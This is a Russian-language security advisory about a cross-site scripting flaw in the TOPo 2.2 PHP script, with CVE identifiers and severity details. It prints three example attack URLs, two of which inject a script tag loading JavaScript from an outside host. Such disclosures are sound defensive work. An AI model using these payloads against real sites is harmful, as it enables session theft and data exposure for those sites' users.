Межсайтовый скриптинг в TOPo

Дата публикации:
23.05.2005
Всего просмотров:
712
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-1715
CVE-2005-1716
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
TOPo 2.x
Уязвимые версии: TOPo 2.2.178

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует в сценарии index.php при обработке входных данных в параметрах 'm', 's', 'ID', и 't'. Удаленный пользователю может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/topo/index.php?m=top">
< SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
< /script>&s=info&ID=1114815037.2498

http://[target]/topo/index.php?m=top&s=info&ID=1115946293.3552
">< SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
< /SCRIPT>&t=puntuar

http://[target] /topo/index.php?m=top&s=info">
< script>alert()</script>&ID=1115946293.3552&t=puntuar

URL производителей: ej3soft.ej3.net/index.php?m=info&s=topo&t=info

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: TOPo 2.2 multiple variable & fields XSS and information disclosure

или введите имя

CAPTCHA